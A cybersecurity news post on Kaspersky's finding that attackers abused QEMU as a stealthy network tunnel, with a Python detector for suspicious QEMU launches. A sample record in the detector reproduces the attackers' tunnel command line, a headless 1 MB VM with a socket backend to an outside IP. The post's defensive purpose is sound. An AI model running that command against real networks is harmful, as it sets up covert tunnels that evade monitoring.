
Hackers use QEMU virtual machines and network tunnels

Brandon Lee

Cybersecurity researchers at Kaspersky have unearthed a sophisticated cyberattack targeting a large corporation, where attackers exploited the open-source hypervisor QEMU as an innovative tunneling mechanism. QEMU, widely recognized for its capability to emulate operating systems and hardware platforms, was manipulated to forge virtual network interfaces and a socket-type network device. This setup enabled a discreet network tunnel between the victim's infrastructure and the attacker's server, with minimal impact on the system's performance.

Network Tunnels

This incident underscores the adaptability and stealth tactics employed by cyber adversaries. Attackers often craft network tunnels to establish a hidden communication pathway with a compromised system, typically encrypting the traffic to elude firewalls and intrusion detection systems. Utilities such as FRP, ngrok, and Cloudflare tunnels, among others, are commonly used for this purpose. Because they are so frequently misused, these tools are generally treated with suspicion by security defenses.

However, the choice of QEMU by the attackers in this scenario was particularly notable for its deviation from conventional tunneling tools, prioritizing stealth over traffic encryption. QEMU's extensive emulation capabilities and ability to simulate virtual networks make it an excellent tool for blending malicious operations within legitimate virtualization traffic and facilitating lateral movement across segmented network zones.

Stealthy backdoor

In their sophisticated approach, the attackers employed additional tools such as Angry IP Scanner for network reconnaissance and mimikatz for credential harvesting, alongside the strategic use of QEMU for network tunneling. To maintain a low detection profile, the virtual machine configured for the attack was allocated merely 1 MB of RAM and ran without a graphical interface, further minimizing its footprint on the system.

The attackers configured the QEMU VM with specific command-line arguments to establish unrestricted network access, socket connections to their server, and interconnectivity between various network backends, effectively camouflaging their presence and activities within the targeted network.

Kaspersky's analysis included simulating the attacker's QEMU setup to understand its mechanics and implications. The simulation illustrated how the attackers bridged an internal host, devoid of direct internet access, to an external pivot point with internet connectivity, ultimately linking to a cloud-based attacker server. This method showcased the attackers' ability to circumvent network security measures and potentially extend their reach within the targeted network.
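The traits described above (a socket network backend connecting outward, more than one network backend bridged inside a single guest, a tiny memory allocation and no display) are exactly what a SOC can look for in process-creation telemetry. The following detector is an added example written for this post, not code from Kaspersky or the QEMU project; it parses QEMU command lines using QEMU's documented -m, -nographic, -netdev and -nic options, and the process records it scans are constructed for illustration (the 16 MiB threshold is an assumption to tune per environment).

```python
"""Flag qemu-system launches that match the low-footprint tunnel pattern:
an outbound socket network backend combined with a tiny memory allocation
and/or no display. Sample process-creation records are constructed here."""
import os
import re
import shlex

TINY_MEM_MB = 16  # assumption: real guests are given far more than this
# Options that consume the following token as their value.
VALUE_OPTS = {"-m", "-netdev", "-nic", "-net", "-device", "-hda", "-cdrom",
              "-kernel", "-name", "-drive", "-smp"}


def parse_mem_mb(text):
    """Convert a QEMU -m argument ('1M', '512', 'size=2G,slots=2') to MiB."""
    first = text.split(",")[0]
    if first.startswith("size="):
        first = first[len("size="):]
    m = re.fullmatch(r"(\d+)([kKmMgG]?)", first)
    if not m:
        return None
    n, unit = int(m.group(1)), m.group(2).lower()
    # A bare number or an 'M' suffix means MiB.
    return {"k": n / 1024, "g": n * 1024}.get(unit, n)


def analyze_qemu_cmdline(cmdline):
    """Return a findings dict for a qemu-system-* launch, or None otherwise."""
    argv = shlex.split(cmdline)
    if not argv or not os.path.basename(argv[0]).startswith("qemu-system"):
        return None
    findings, backends, mem_mb = set(), [], None
    i = 1
    while i < len(argv):
        opt = argv[i]
        val = argv[i + 1] if opt in VALUE_OPTS and i + 1 < len(argv) else ""
        if opt == "-nographic":
            findings.add("headless")
        elif opt == "-m":
            mem_mb = parse_mem_mb(val)
        elif opt in ("-netdev", "-nic"):
            kind = val.split(",")[0]          # backend type: user, tap, socket...
            backends.append(kind)
            if kind == "socket" and "connect=" in val:
                findings.add("outbound_socket_backend")
        i += 2 if opt in VALUE_OPTS else 1
    if mem_mb is not None and mem_mb <= TINY_MEM_MB:
        findings.add("tiny_memory")
    if len(set(backends)) > 1:
        findings.add("mixed_backends")        # several backends bridged in one guest
    suspicious = ("outbound_socket_backend" in findings
                  and bool({"tiny_memory", "headless"} & findings))
    return {"mem_mb": mem_mb, "backends": backends,
            "findings": sorted(findings), "suspicious": suspicious}


def scan_process_log(records):
    """records: iterable of (host, cmdline). Returns (host, findings) hits."""
    hits = []
    for host, cmdline in records:
        result = analyze_qemu_cmdline(cmdline)
        if result and result["suspicious"]:
            hits.append((host, result))
    return hits


# Constructed sample process-creation records (not taken from the post or report).
SAMPLE_RECORDS = [
    ("ws-17", "qemu-system-i386 -m 1M -nographic -netdev user,id=lan "
              "-netdev socket,id=out,connect=203.0.113.10:443 "
              "-device e1000,netdev=lan -device e1000,netdev=out"),
    ("dev-03", "qemu-system-x86_64 -m 4G -hda /home/dev/ubuntu.qcow2 "
               "-netdev user,id=n0 -device virtio-net,netdev=n0"),
    ("build-01", "/usr/bin/make -j8"),
]

if __name__ == "__main__":
    for host, result in scan_process_log(SAMPLE_RECORDS):
        print(host, result["findings"])
```

Run against the samples, only ws-17 is reported; the developer workstation running a 4 GB guest with a single user-mode backend is left alone. Feeding it real EDR process-creation events is a matter of mapping each event's host and command line onto the (host, cmdline) tuples the scanner expects.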

Kaspersky's findings highlight the necessity for organizations to implement multi-layered security defenses, emphasizing continuous network monitoring to detect and counteract the misuse of legitimate tools in cyberattacks. This strategy underscores the importance of comprehensive security solutions, incorporating endpoint protection and specialized tools to thwart advanced, targeted threats. Effective cybersecurity requires not just robust technology but also skilled security operations center (SOC) personnel who can identify and neutralize threats promptly, stopping an attack in its initial stages.


Posted : 05/03/2024 3:38 pm